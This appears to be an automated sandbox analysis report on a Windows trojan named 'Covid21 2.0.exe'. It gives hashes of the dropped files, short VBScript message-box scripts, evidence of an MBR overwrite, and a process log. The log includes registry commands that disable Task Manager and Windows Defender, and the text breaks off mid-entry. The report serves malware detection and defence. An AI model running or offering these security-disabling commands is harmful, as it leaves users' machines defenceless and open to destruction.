                                C:\Users\user\AppData\Local\Temp\2526.tmp\mlt.exe
                                Process:C:\Users\user\Desktop\Covid21 2.0.exe
                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                Category:dropped
                                Size (bytes):133205
                                Entropy (8bit):5.137252527177841
                                Encrypted:false
                                SSDEEP:1536:cPFc9HtJsjy6maNXRBOseWG7NVW/ZTAUvMFMQiNXR/QRBX1bXckplRU:sS9N+fB47NVW/ZToWRofXZX5lRU
                                MD5:A4E26D32F9655DBE8EFD276A530EB02B
                                SHA1:D194526518FDDD34BFC75CC0575D9B5CF3E1E304
                                SHA-256:4C2277C81CBF6C415AB874CFB32D3B0049C8B18AC7EEE1DD6C1F5D9F5F043C83
                                SHA-512:E77C58B321A1C696554B018CC51FAD2F2DF4BAC39FA90F17A83EC646C90D67B6DA5FCCB2E80C468E2CF32CC7F9F3F62B160C3F0AFBC2130FAA1002ECDE5B5676
                                Malicious:true
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...6._..........'...........................@.............................. .......)........ ..............................................................P..4........................................... ...(...................<................................text...0........................... .P`.data........0.......$..............@.P..rdata.......@.......&..............@.P@.pdata..4....P......................@.0@.xdata.......`.......2..............@.0@.bss....`....p........................p..idata...............4..............@.0..CRT....h............>..............@.@..tls....h............@..............@.`./4...... ............B..............@.PB/19.....z............H..............@..B/31.....<...........................@..B/45..................$..............@..B/57..................>..............@.@B/70..................J..............@..B/81.....
                                C:\Users\user\AppData\Local\Temp\2526.tmp\prompt.vbs
                                Process:C:\Users\user\Desktop\Covid21 2.0.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):188
                                Entropy (8bit):4.787831418201213
                                Encrypted:false
                                SSDEEP:3:KRCWhCOHGJ5FcFP01RFPKO9/zRWPxBIXFMlkLvxWeeXlVSpXAov/FLVS9AD:KI/NJSyd/sKFMlCvxW3S3NpSyD
                                MD5:82C0A5E92259FF193B914E6C0D7C8A7A
                                SHA1:ED6868EFF7055555689E613A62F4275EAFA97C36
                                SHA-256:02E3663BB7BC9F8FE4377887DC24E63FC83187BE9CB0181F87E5F93AF4C7CA8B
                                SHA-512:43C1EF453531200DD625945A65727DAEF28EE480FB210E97846633841F8215261E3195A8BE77C280E8B6FE193B59C7367302C3FC74879B5952FA31F3235DDB62
                                Malicious:false
                                Preview: intAnswer = _.. Msgbox("This Trojan is no joke, do you want to run it?", _.. vbYesNo, "Covid-21")..If intAnswer = vbYes Then.. WScript.Quit 1..Else.. WScript.Quit 0..End If
                                C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exe
                                Process:C:\Users\user\Desktop\Covid21 2.0.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):113664
                                Entropy (8bit):7.838778904595643
                                Encrypted:false
                                SSDEEP:1536:o0J9QXrssV7g4Rq3b24oFDo2mL7oagiBGVHo8J75qUbGuNxTJeqq62hxcmpn6izz:o0J9QbLkewys+C6pNxFE7Z6wAO
                                MD5:E87A04C270F98BB6B5677CC789D1AD1D
                                SHA1:8C14CB338E23D4A82F6310D13B36729E543FF0CA
                                SHA-256:E03520794F00FB39EF3CFFF012F72A5D03C60F89DE28DBE69016F6ED151B5338
                                SHA-512:8784F4D42908E54ECEDFB06B254992C63920F43A27903CCEDD336DAAEED346DB44E1F40E7DB971735DA707B5B32206BE1B1571BC0D6A2D6EB90BBF9D1F69DE13
                                Malicious:true
                                Antivirus:
                                • Antivirus: Metadefender, Detection: 36%, Browse
                                • Antivirus: ReversingLabs, Detection: 62%
                                Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.............................p............@..............................................@..........................................................T...............................<.......................................................CODE.............P..................@...DATA.................T..............@...BSS.......... .......Z..............@....idata... ...0.......Z..............@....tls.........P.......f..............@....rdata.......`.......f..............@....reloc...@...p.......h..............@....rsrc............:...h..............@....aspack.. ...p......................@....adata..............................@...................................................................................................
                                C:\Users\user\AppData\Local\Temp\2526.tmp\t.vbs
                                Process:C:\Windows\SysWOW64\cmd.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.385220179839388
                                Encrypted:false
                                SSDEEP:3:rCmFOIaPMogDXK+8YHSv:FFJaCDXxDHc
                                MD5:EE0306A79AAEFBD4CF3BC7E5F8A0D3B1
                                SHA1:32DAE2CFB0AF831F0E8445F36C0D2CE0FE9B2E88
                                SHA-256:969AE83F1366975BECE266C3BE5994291C55302E93564A1435FE542B456904EC
                                SHA-512:FDFAB128F4F096F4B4DD31758116522337644F269CB28E1496E20D866083BF31D277A123704E8924A0FC4EF0212CBA89E3AB9FDDCAFFCF400C859C8DF87736FD
                                Malicious:true
                                Preview: msgbox "Your Windows will die from Covid-21 Corona Virus" ..
                                C:\Users\user\AppData\Local\Temp\2526.tmp\x.vbs
                                Process:C:\Windows\SysWOW64\cmd.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):79
                                Entropy (8bit):4.403941477424042
                                Encrypted:false
                                SSDEEP:3:xDCHGF6IX8SAfPMtjxdMzlyJ4:xYGFr8jfkjxdMRyJ4
                                MD5:7740551865A57633B3E92986352DFA1B
                                SHA1:74070B3636B69B710C32996FC1640129202F4CAF
                                SHA-256:8A36ECC37EB454FE13B4B31EB9EDA67919AA5DD3A474480930982EF93334499A
                                SHA-512:B4C5902F3CA91FA83EC0297254ACF5F63B2145500863AFB86F96B9C2D3844C8C476CD0F6DD31E3EB92C4ACA2CD35C2F6BE563549817B676FA9B4592F280C79F2
                                Malicious:true
                                Preview: do ..msgbox "Covid-21 is here! Your Windows will get destroyed soon!" ..loop ..
                                C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs
                                Process:C:\Windows\SysWOW64\cmd.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):24
                                Entropy (8bit):3.938721875540868
                                Encrypted:false
                                SSDEEP:3:rCmFLFDgov:FFxJ
                                MD5:5ECB02EAAA322BE4DF7F61A1A23C799D
                                SHA1:BEC83A2546F38A7133EF962D09CD520F87E5ABB2
                                SHA-256:D78710D080D6200BFF04D443F8FA923F619914FB191DC2B3865DA1F3D9739E30
                                SHA-512:2306F4FC08E0AEFE4A44C4507E46EE2D3D808423EC8D31980980F785E20C0DF301A9B3D9A2469D609E054D5A8AC4089AC39FFB388B70ED8A36F688B4362A2F88
                                Malicious:true
                                Preview: msgbox "corona virus" ..
                                C:\Users\user\AppData\Local\Temp\2526.tmp\z.exe
                                Process:C:\Users\user\Desktop\Covid21 2.0.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):422029
                                Entropy (8bit):6.688336510135275
                                Encrypted:false
                                SSDEEP:12288:5NIQAPGsAqY9IMVYd38sJdpQHlGlY8KfTQ:uPGSY91VwNJcFMqTQ
                                MD5:A7CE5BEE03C197F0A99427C4B590F4A0
                                SHA1:14D8617C51947FB49B3ABA7E9AECE83E5094CF71
                                SHA-256:0C53A3EC2B432A9013546F92416109D7E8F64CEA26AC2491635B4CF2A310D852
                                SHA-512:7F3C56C42D899ADA5ACDC5C162391F9FA06455DB08E6DF0A57132CA5B1BB3D52E6DBC9342310480D45AA32915502ACEB7552375A45D3FD1A54FEE0E73AF6024A
                                Malicious:true
                                Antivirus:
                                • Antivirus: Metadefender, Detection: 0%, Browse
                                • Antivirus: ReversingLabs, Detection: 7%
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Lp.........................}...........2..............2.......2.................c........................Rich............................PE..L......J.....................>......O+............@...........................................@..............................'........... ...........................................................................................................text.............................. ..`.rdata..(...........................@..@.data....z...P... ...4..............@....rsrc.... ...........T..............@..@................................................................................................................................................................................................................................................................................................................................
                                C:\Windows\clwcp.bmp
                                Process:C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe
                                File Type:PC bitmap, Windows 3.x format, 1920 x 1080 x 24
                                Category:dropped
                                Size (bytes):6220854
                                Entropy (8bit):6.660583803059703
                                Encrypted:false
                                SSDEEP:24576:cjUJucwO/CkHCoUQnI7Er5OBVB8JCsMjdsWYDaFWiG0SQbrGJVXVuBX0j6BHpsPH:gUJucwHkHlUQ9QBr8nMqVD/6SbuB8BV
                                MD5:1A6ACC65486762EE05D1ABD90169CAF2
                                SHA1:12DB4A705D5DBDA06625FA38FC6B1A6AD73FD0B9
                                SHA-256:0733EE5D3CF3B3E574C3A052C78DFC0D9791A7099DFAA8D3A0372075496311B3
                                SHA-512:D4B2E9E7261FF91DB206242314D50C66978E0353E113D72BC48637A41D12D3CFA00C5F04B2A744937769CD433ABADB9872C72CF158A9F0863B9F40B6962D27D5
                                Malicious:false
                                Preview: BM6.^.....6...(.......8.............^......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... .. .. .. .. .. .. .. ..!..!..!..!..!..!..!..!..!..!..!. !. !. !. !. !. !. !. !. !. !. !. !. !. !. !. !. !. !. !. !. !. ".!".!".!".!".!".!".!".!!. !. ".!".!".!".!".!".!" " " " " " " " " " " " " " " " #!!#!!#!!#!!#!!#!!#!!#!!#!!#!!#!!#!!#!!#!!#!!#!!$!#$!#$!#$!#$!#$!#$!#$!#$!#$!#$!#$
                                C:\covid21\Corona.exe
                                Process:C:\Windows\SysWOW64\cmd.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):531456
                                Entropy (8bit):7.007155751747995
                                Encrypted:false
                                SSDEEP:12288:bt007p82D5NYQ1bjLXHfNOTliq6G8/Q3Uk+leP4RG3:2qpzvYQ1Tfoi8b3U1kaq
                                MD5:6374CA8AD59246DFED4794FD788D6560
                                SHA1:D54281430AD11272F657DE4E909B4BA7B8561821
                                SHA-256:25B6F4ABC0B8A7A3F3CAE54A2F75810B977C0F5ED20AF98E77BE9449E7135108
                                SHA-512:0434F5C6ECD1A036A59E2F5DE56F0905460D46C31FFF6A7F160F54CFBCB56EA2DA22647D564E53D66C47A789A67D165C59E64D924B0F2CF80FDCD865847A772F
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 8%
                                Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................2......H.............@..............................................@...........................0..V ..............................LX...........................p......................................................CODE................................ ..`DATA....8...........................@...BSS.......... ...........................idata..V ...0..."..................@....tls.........`...........................rdata.......p......................@..P.reloc..LX.......Z... ..............@..P.rsrc................z..............@..P....................................@..P........................................................................................................................................
                                C:\covid21\covid.jpg
                                Process:C:\Windows\SysWOW64\cmd.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 1920x1080, frames 3
                                Category:dropped
                                Size (bytes):170445
                                Entropy (8bit):7.987389688426996
                                Encrypted:false
                                SSDEEP:3072:mTwQIE+8Tj6wFrxGxGtSdWyCmI5KkeD8vcWtTH3Mi/gc+P9IP7HwKFKBlrF:qOE+o6hgcYLmI5+8k+TH3Mi/J+Pi7Hwn
                                MD5:94AD752ABC09644D0B91A07022ECB000
                                SHA1:7EE97DC56E62E7B2D86EE892E7CF70673252242F
                                SHA-256:E3760C671CEC108580D47B0F8C11AE79E9DF9941D2E878032EEDA1B510F91231
                                SHA-512:9C0109A8E7DE5EA42B3CE8788A412F6ED1158AFD3DB87884034631DA15EC4C16275F0578C6AD438E91DC203C89AEF725D2642E06B751DF5CFF0D47B3D9A1AD1E
                                Malicious:false
                                Preview: ......JFIF.....H.H......ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C..................................................#...#*%%*525EE\...C..................................................#...#*%%*525EE\......8....".....................................................................................DFD..)`.$bD...1"#"DIP..."$d..H.D..bI .(.F ......."I.F.0..b.A..I".B0...$.F.0#.$$`(H..$.J...W..~R....5...i.xlVc'..j.2b..U^}y..>d...)P$B F...P..1.T............T.PS*.aL@..B......$.0....0...$.. I.@."..$
                                \Device\Harddisk0\DR0
                                Process:C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe
                                File Type:DOS/MBR boot sector
                                Category:dropped
                                Size (bytes):12288
                                Entropy (8bit):3.0505993617935707
                                Encrypted:false
                                SSDEEP:96:CHNWrlndausdjYdjdRRYYyWNt5UIm9iD6gYOAFCgNfMrk:CtWbds1YdRdNHZm9iDPY6g8k
                                MD5:84FA41E4FEF5AA7996B2249DD344D541
                                SHA1:AA23B3211D81A35B9A1FB99CA18D6E15FDE230C6
                                SHA-256:F35C7820202E4FD04F3C35A4E2F3719A1A5FD236B6A623B28909B43DC1C00AB4
                                SHA-512:CCDA181C489350F2ECBDFF58AFD8D639BCA38392BD24FDC27C58B42213B824898E7C2023C7531A70FE830304E820E0EDCF745831849E53F2AE880C33A87A1B22
                                Malicious:true
                                Preview: ..................1................s1<.s...$.........u....<@r.$?........).................................C.................}.....2...........................................................................................................................................................................................................................................................................................................................................................................U...??? 000.... .??.. . ..?............ .@@@.@...A...B...C.................+K..c..$.....a....,.........v.@KA..O.@Dj..D.......@H...C.....H.A-@..L.@T@.................%........c..H.....l..c..k..........@T@..j.....V.................P..w..6..u..}..Y.._..$..Z....@_@.....@.....%.....w..]..[.3@..+..@..5.@m@.......-@..-..@.....E..e..Q....@N......@..-.@v...@.....@..G.@L@..%..w..e........H..-.....@........u.....~.@...A?,.C(T.+J.@mU.>...=..X.5q..h.@...@Xy..X.A@@. q.....T..-...........d.....?.

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                Entropy (8bit):7.7326173175378665
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.39%
                                • UPX compressed Win32 Executable (30571/9) 0.30%
                                • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                File name:Covid21 2.0.exe
                                File size:1210880
                                MD5:a7c7f5e792809db8653a75c958f82bc4
                                SHA1:7ebe75db24af98efdcfebd970e7eea4b029f9f81
                                SHA256:02fea9970500d498e602b22cea68ade9869aca40a5cdc79cf1798644ba2057ca
                                SHA512:feb42cc7b4f344c043bda8bebeefa8cbb68406d1e937dcdc5a403981f79587fa438c682c4744a47a77482fc049b0334806d468aeb67edd4a92d90b5acd0c16ae
                                SSDEEP:24576:kweQ5x+HPXJ9N2qifMpZcu/6z6toe20xYuLFzY77+89J9o2:kwVeHhH2qoMIum62uhY7Kco2
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'..L...............2.`...0...P..0.)..`....)...@...........................,............................................

                                File Icon

                                Icon Hash:4c8e2b2f0f030e0d

                                Static PE Info

                                General

                                Entrypoint:0x69aa30
                                Entrypoint Section:UPX1
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                DLL Characteristics:
                                Time Stamp:0x4CD7F727 [Mon Nov 8 13:12:07 2010 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:1d88d597200c0081784c27940d743ec5

                                Entrypoint Preview

                                Instruction
                                pushad
                                mov esi, 005A6015h
                                lea edi, dword ptr [esi-001A5015h]
                                push edi
                                mov ebp, esp
                                lea ebx, dword ptr [esp-00003E80h]
                                xor eax, eax
                                push eax
                                cmp esp, ebx
                                jne 00007F1CECB0260Dh
                                inc esi
                                inc esi
                                push ebx
                                push 00298988h
                                push edi
                                add ebx, 04h
                                push ebx
                                push 000F4A0Bh
                                push esi
                                add ebx, 04h
                                push ebx
                                push eax
                                mov dword ptr [ebx], 00020003h
                                nop
                                nop
                                nop
                                nop
                                nop
                                push ebp
                                push edi
                                push esi
                                push ebx
                                sub esp, 7Ch
                                mov edx, dword ptr [esp+00000090h]
                                mov dword ptr [esp+74h], 00000000h
                                mov byte ptr [esp+73h], 00000000h
                                mov ebp, dword ptr [esp+0000009Ch]
                                lea eax, dword ptr [edx+04h]
                                mov dword ptr [esp+78h], eax
                                mov eax, 00000001h
                                movzx ecx, byte ptr [edx+02h]
                                mov ebx, eax
                                shl ebx, cl
                                mov ecx, ebx
                                dec ecx
                                mov dword ptr [esp+6Ch], ecx
                                movzx ecx, byte ptr [edx+01h]
                                shl eax, cl
                                dec eax
                                mov dword ptr [esp+68h], eax
                                mov eax, dword ptr [esp+000000A8h]
                                movzx esi, byte ptr [edx]
                                mov dword ptr [ebp+00h], 00000000h
                                mov dword ptr [esp+60h], 00000000h
                                mov dword ptr [eax], 00000000h
                                mov eax, 00000300h
                                mov dword ptr [esp+64h], esi
                                mov dword ptr [esp+5Ch], 00000001h
                                mov dword ptr [esp+58h], 00000001h
                                mov dword ptr [esp+54h], 00000001h

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x2cdf440x220.rsrc
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x29c0000x31f44.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                UPX00x10000x1a50000x0False0empty0.0IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                UPX10x1a60000xf60000xf5600False0.999160245797data7.99978608598IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                .rsrc0x29c0000x330000x32200False0.41157360505data4.64567241992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountry
                                RT_ICON0x29c2500x31828data
                                RT_RCDATA0x3da740x5a4empty
                                RT_RCDATA0x3e0180x25a4cfempty
                                RT_RCDATA0x2984e80xbedata
                                RT_RCDATA0x2985a80xbdata
                                RT_RCDATA0x2985b40x6Non-ISO extended-ASCII text, with no line terminators
                                RT_GROUP_ICON0x2cda7c0x14data
                                RT_VERSION0x2cda940x210data
                                RT_MANIFEST0x2cdca80x29cXML 1.0 document, ASCII text, with very long lines, with no line terminators

                                Imports

                                DLLImport
                                KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                                COMCTL32.dllInitCommonControls
                                GDI32.dllSetBkColor
                                MSVCRT.dllmemset
                                OLE32.dllCoInitialize
                                SHELL32.dllShellExecuteExA
                                SHLWAPI.dllPathQuoteSpacesA
                                USER32.dllIsChild

                                Version Infos

                                DescriptionData
                                InternalNamecovid-21
                                ProductNamecovid21 corona virus
                                FileVersion2,0,0,0
                                ProductVersion2,0,0,0
                                FileDescriptionRun this only on vm
                                Translation0x0000 0x04e4

                                Network Behavior

                                No network behavior found

                                Code Manipulations

                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                Analysis Process: Covid21 2.0.exe PID: 6564 Parent PID: 6032

                                General

                                Start time:15:53:07
                                Start date:28/03/2021
                                Path:C:\Users\user\Desktop\Covid21 2.0.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\Desktop\Covid21 2.0.exe'
                                Imagebase:0x400000
                                File size:1210880 bytes
                                MD5 hash:A7C7F5E792809DB8653A75C958F82BC4
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low

                                Chronological Activities

                                Analysis Process: cmd.exe PID: 6616 Parent PID: 6564

                                General

                                Start time:15:53:08
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\2526.tmp\Covid21.bat' '
                                Imagebase:0x11d0000
                                File size:232960 bytes
                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Analysis Process: conhost.exe PID: 6632 Parent PID: 6616

                                General

                                Start time:15:53:08
                                Start date:28/03/2021
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff724c50000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Analysis Process: cscript.exe PID: 6680 Parent PID: 6616

                                General

                                Start time:15:53:09
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\cscript.exe
                                Wow64 process (32bit):true
                                Commandline:cscript prompt.vbs
                                Imagebase:0xaf0000
                                File size:143360 bytes
                                MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Chronological Activities

                                Analysis Process: reg.exe PID: 6760 Parent PID: 6616

                                General

                                Start time:15:53:12
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\reg.exe
                                Wow64 process (32bit):true
                                Commandline:REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                Imagebase:0x2d0000
                                File size:59392 bytes
                                MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Analysis Process: reg.exe PID: 6780 Parent PID: 6616

                                General

                                Start time:15:53:13
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\reg.exe
                                Wow64 process (32bit):true
                                Commandline:Reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                Imagebase:0x2d0000
                                File size:59392 bytes
                                MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Analysis Process: CLWCP.exe PID: 6804 Parent PID: 6616

                                General

                                Start time:15:53:14
                                Start date:28/03/2021
                                Path:C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe
                                Wow64 process (32bit):true
                                Commandline:clwcp c:\covid21\covid.jpg
                                Imagebase:0x400000
                                File size:517120 bytes
                                MD5 hash:E62EE6F1EFC85CB36D62AB779DB6E4EC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Borland Delphi
                                Antivirus matches:
                                • Detection: 4%, Virustotal, Browse
                                • Detection: 8%, Metadefender, Browse
                                • Detection: 0%, ReversingLabs
                                Reputation:low

                                Chronological Activities

                                Analysis Process: reg.exe PID: 6836 Parent PID: 6616

                                General

                                Start time:15:53:18
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\reg.exe
                                Wow64 process (32bit):true
                                Commandline:reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
                                Imagebase:0x2d0000
                                File size:59392 bytes
                                MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Analysis Process: wscript.exe PID: 6888 Parent PID: 6616

                                General

                                Start time:15:53:19
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\wscript.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\x.vbs'
                                Imagebase:0x2f0000
                                File size:147456 bytes
                                MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Analysis Process: cmd.exe PID: 6912 Parent PID: 6616

                                General

                                Start time:15:53:19
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\system32\cmd.exe /K coronaloop.bat
                                Imagebase:0x11d0000
                                File size:232960 bytes
                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Analysis Process: timeout.exe PID: 6932 Parent PID: 6616

                                General

                                Start time:15:53:20
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\timeout.exe
                                Wow64 process (32bit):true
                                Commandline:timeout 5 /nobreak
                                Imagebase:0x260000
                                File size:26112 bytes
                                MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Analysis Process: conhost.exe PID: 6940 Parent PID: 6912

                                General

                                Start time:15:53:20
                                Start date:28/03/2021
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff724c50000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Analysis Process: Corona.exe PID: 6984 Parent PID: 6912

                                General

                                Start time:15:53:20
                                Start date:28/03/2021
                                Path:C:\covid21\Corona.exe
                                Wow64 process (32bit):true
                                Commandline:c:\covid21\corona.exe
                                Imagebase:0x400000
                                File size:531456 bytes
                                MD5 hash:6374CA8AD59246DFED4794FD788D6560
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Borland Delphi
                                Antivirus matches:
                                • Detection: 8%, ReversingLabs
                                Reputation:low

                                Chronological Activities

                                Analysis Process: inv.exe PID: 7092 Parent PID: 6616

                                General

                                Start time:15:53:25
                                Start date:28/03/2021
                                Path:C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe
                                Wow64 process (32bit):true
                                Commandline:inv.exe
                                Imagebase:0x400000
                                File size:367616 bytes
                                MD5 hash:EBB811D0396C06A70FE74D9B23679446
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Borland Delphi
                                Antivirus matches:
                                • Detection: 6%, Metadefender, Browse
                                • Detection: 48%, ReversingLabs
                                Reputation:low

                                Chronological Activities

                                Analysis Process: wscript.exe PID: 7104 Parent PID: 6616

                                General

                                Start time:15:53:25
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\wscript.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs'
                                Imagebase:0x2f0000
                                File size:147456 bytes
                                MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Chronological Activities

                                Analysis Process: timeout.exe PID: 7120 Parent PID: 6616

                                General

                                Start time:15:53:26
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\timeout.exe
                                Wow64 process (32bit):true
                                Commandline:timeout 5 /nobreak
                                Imagebase:0x260000
                                File size:26112 bytes
                                MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Chronological Activities

                                Analysis Process: z.exe PID: 6544 Parent PID: 6616

                                General

                                Start time:15:53:31
                                Start date:28/03/2021
